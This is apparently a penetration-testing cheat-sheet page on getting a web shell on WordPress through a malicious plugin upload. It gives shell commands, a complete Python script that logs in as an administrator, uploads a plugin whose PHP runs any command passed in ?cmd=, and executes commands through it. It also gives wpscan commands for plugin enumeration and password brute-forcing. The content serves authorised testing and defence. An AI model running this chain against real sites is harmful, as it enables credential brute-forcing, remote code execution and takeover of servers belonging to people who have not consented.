Malicious Plugin

Get a web shell by uploading a malicious plugin. Plugin upload needs an account with the install_plugins capability (an administrator on a single-site install).
Copy a plugin shell from SecLists and zip it:
$ cp /usr/share/seclists/Web-Shells/WordPress/plugin-shell.php .
$ zip plugin-shell.zip plugin-shell.php
Upload plugin-shell.zip (Plugins > Add New > Upload Plugin > Browse... > Install Now) but do not activate it: WordPress unpacks the zip into wp-content/plugins/<zip name>/, so the PHP file is already reachable over HTTP and the shell works without activation (activating only adds noise). Now you can access the web shell:
$ curl ''
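The steps above (build the zip, log in, install without activating, call the shell) automated end to end, as an added example that is not part of the original page or of SecLists. It assumes a target at BASE_URL with administrator credentials USER/PASS and ships its own minimal plugin shell (SHELL_PHP, a hypothetical stand-in for plugin-shell.php) that runs whatever is passed in ?cmd=. The wp-login.php field names, the pluginzip/_wpnonce/install-plugin-submit form fields and the update.php?action=upload-plugin endpoint are WordPress's own.

```python
"""Drive the WordPress plugin-upload flow with a shell-bearing plugin.

Added example, not the original page's or SecLists' code. Assumptions: a
target at BASE_URL with administrator credentials USER/PASS, and a minimal
hypothetical shell (SHELL_PHP) that runs the command in the ?cmd= parameter.
"""
import http.cookiejar
import io
import re
import urllib.parse
import urllib.request
import uuid
import zipfile

BASE_URL = "http://wordpress.local"   # assumed target
USER, PASS = "admin", "password"      # assumed credentials
PLUGIN_SLUG = "plugin-shell"

# The header comment is what makes WordPress accept the file as a plugin;
# the one-line body is the (hypothetical) shell itself.
SHELL_PHP = """<?php
/*
Plugin Name: plugin-shell
Description: uploaded during an authorised test
Version: 1.0
*/
if (isset($_GET['cmd'])) { system($_GET['cmd']); }
"""


def build_plugin_zip(slug=PLUGIN_SLUG, php=SHELL_PHP):
    """Zip the shell as <slug>/<slug>.php so the install path is predictable:
    WordPress copies a zip's single top-level directory into wp-content/plugins/."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(f"{slug}/{slug}.php", php)
    return buf.getvalue()


def zip_members(data):
    """List the entries of a zip held in memory (used to check the layout)."""
    return zipfile.ZipFile(io.BytesIO(data)).namelist()


def shell_path(slug=PLUGIN_SLUG):
    """Where the shell lives once installed (no activation required)."""
    return f"/wp-content/plugins/{slug}/{slug}.php"


def extract_nonce(html):
    """Pull the plugin-upload nonce out of plugin-install.php?tab=upload."""
    m = re.search(r'name="_wpnonce"\s+value="([0-9a-f]+)"', html)
    if not m:
        raise ValueError("no _wpnonce field: not logged in or not an admin?")
    return m.group(1)


def multipart(fields, file_field, filename, data, boundary=None):
    """Encode form fields plus one zip upload as multipart/form-data."""
    boundary = boundary or uuid.uuid4().hex
    out = io.BytesIO()
    for name, value in fields.items():
        out.write(f'--{boundary}\r\nContent-Disposition: form-data; name="{name}"'
                  f'\r\n\r\n{value}\r\n'.encode())
    out.write(f'--{boundary}\r\nContent-Disposition: form-data; name="{file_field}"; '
              f'filename="{filename}"\r\nContent-Type: application/zip\r\n\r\n'.encode())
    out.write(data)
    out.write(f"\r\n--{boundary}--\r\n".encode())
    return f"multipart/form-data; boundary={boundary}", out.getvalue()


def upload_and_run(base=BASE_URL, user=USER, password=PASS, cmd="id"):
    """Log in, install (not activate) the plugin, then call the shell."""
    jar = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))
    # wp-login.php refuses a POST unless its test cookie from a prior GET is present.
    opener.open(base + "/wp-login.php").read()
    login = urllib.parse.urlencode({"log": user, "pwd": password, "wp-submit": "Log In",
                                    "redirect_to": base + "/wp-admin/", "testcookie": "1"})
    opener.open(base + "/wp-login.php", login.encode()).read()
    # The upload form carries a per-session nonce that update.php checks.
    html = opener.open(base + "/wp-admin/plugin-install.php?tab=upload").read().decode()
    nonce = extract_nonce(html)
    ctype, body = multipart(
        {"_wpnonce": nonce, "_wp_http_referer": "/wp-admin/plugin-install.php?tab=upload",
         "install-plugin-submit": "Install Now"},
        "pluginzip", f"{PLUGIN_SLUG}.zip", build_plugin_zip())
    req = urllib.request.Request(base + "/wp-admin/update.php?action=upload-plugin",
                                 data=body, headers={"Content-Type": ctype})
    opener.open(req).read()          # "Install Now" only; we never activate
    url = base + shell_path() + "?" + urllib.parse.urlencode({"cmd": cmd})
    return opener.open(url).read().decode()


if __name__ == "__main__":
    print(upload_and_run(cmd="id"))
```

Zipping the shell inside a directory (plugin-shell/plugin-shell.php) makes the installed path predictable; the flat zip built by hand above lands in the same place because WordPress names the plugin directory after the zip. Remove the plugin from Plugins > Installed Plugins when the test is over.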

To obtain the administrator credentials the upload needs, enumerate all plugins (-e ap, with vulnerability data pulled via the API token) and brute-force logins against the users wpscan enumerates:
$ wpscan --url --api-token <API_TOKEN> --force -e ap [--plugins-detection aggressive] -o wpscan.out
$ wpscan --url --api-token <API_TOKEN> --force --passwords /usr/share/seclists/Passwords/darkweb2017-top1000.txt